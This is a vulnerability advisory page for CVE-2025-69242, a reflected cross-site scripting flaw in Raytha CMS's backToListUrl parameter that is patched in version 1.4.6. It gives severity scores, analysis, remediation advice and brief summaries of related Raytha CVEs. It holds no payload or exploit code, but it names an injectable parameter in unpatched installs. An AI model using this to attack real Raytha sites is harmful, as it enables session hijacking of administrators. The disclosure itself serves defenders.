Skip to main content

Raytha CVE-2025-69242

| EUVDEUVD-2025-208711 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-03-16 CERT-PL
5.1
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A

Lifecycle Timeline

4
Patch available
Apr 16, 2026 - 05:29 EUVD
1.4.6
EUVD ID Assigned
Mar 16, 2026 - 12:00 euvd
EUVD-2025-208711
Analysis Generated
Mar 16, 2026 - 12:00 vuln.today
CVE Published
Mar 16, 2026 - 11:54 nvd
MEDIUM 5.1

DescriptionCVE.org

Raytha CMS is vulnerable to reflected XSS via the backToListUrl parameter. An attacker can craft a malicious URL which, when opened by authenticated victim, results in arbitrary JavaScript execution in the victim’s browser.

This issue was fixed in version 1.4.6.

AnalysisAI

Raytha CMS contains a reflected cross-site scripting (XSS) vulnerability in the backToListUrl parameter that allows unauthenticated attackers to inject arbitrary JavaScript code. When an authenticated victim visits a specially crafted malicious URL, the injected script executes in their browser context, potentially allowing session hijacking, credential theft, or malware distribution. The vulnerability was patched in version 1.4.6, and while the CVSS score of 5.1 is moderate, the attack requires user interaction (UI:A) but no authentication, making it a practical attack vector against admin users.

Technical ContextAI

This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation, also known as Cross-site Scripting). The backToListUrl parameter in Raytha CMS fails to properly sanitize or escape user-supplied input before reflecting it back in the HTTP response, allowing attackers to inject malicious JavaScript payloads. Raytha CMS is a headless content management system built on modern web technologies. The root cause is inadequate input validation and output encoding on a navigation-related parameter, which is often overlooked during security reviews because it appears to be a benign internal application parameter. The reflected nature means the payload must be delivered via URL, making it suitable for phishing campaigns targeting authenticated administrators.

RemediationAI

Upgrade Raytha CMS to version 1.4.6 or later immediately, as this is the patched version that addresses the backToListUrl XSS vulnerability. Until patching is possible, implement input validation and output encoding on all URL parameters, particularly navigation-related parameters like backToListUrl, by enforcing URL whitelisting, encoding user input with HTML entity encoding, and applying Content Security Policy (CSP) headers to restrict script execution. Additionally, restrict administrative access to trusted IP ranges and require multi-factor authentication for CMS administrators to reduce the surface area for credential compromise. Review server logs for any evidence of exploitation attempts targeting the backToListUrl parameter.

More in Raytha

View all
CVE-2026-12076 CRITICAL
9.3 Jun 30

SQL injection in Raytha CMS 1.5.2 lets a remote, unauthenticated attacker inject arbitrary SQL through the OData filter

CVE-2025-15540 HIGH
8.8 Mar 16

A code injection vulnerability in Raytha CMS's Functions module allows privileged users to execute arbitrary .NET operat

CVE-2025-69240 HIGH
7.5 Mar 16

A host header injection vulnerability in Raytha CMS allows attackers to hijack password reset tokens by spoofing X-Forwa

CVE-2025-69243 MEDIUM
6.9 Mar 16

Raytha CMS contains a user enumeration vulnerability in its password reset functionality where differing error messages

CVE-2025-69246 MEDIUM
6.9 Mar 16

Raytha CMS lacks brute force protection mechanisms, allowing attackers to conduct unlimited automated login attempts wit

CVE-2025-69238 MEDIUM
6.9 Mar 16

Raytha CMS contains a Cross-Site Request Forgery (CSRF) vulnerability across multiple endpoints that fails to enforce to

CVE-2025-69241 MEDIUM
5.3 Mar 16

Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the profile editing functionality, specifically

CVE-2025-69245 MEDIUM
5.1 Mar 16

Raytha CMS contains a Reflected Cross-Site Scripting (XSS) vulnerability in the logon functionality's returnUrl paramete

CVE-2025-69237 MEDIUM
5.1 Mar 16

Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the page creation functionality through the Fie

CVE-2025-69236 MEDIUM
5.1 Mar 16

Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the post editing functionality, specifically wi

CVE-2025-69239 MEDIUM
5.1 Mar 16

Raytha CMS contains a Server-Side Request Forgery (SSRF) vulnerability in its Theme Import from URL feature that allows

Share

CVE-2025-69242 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy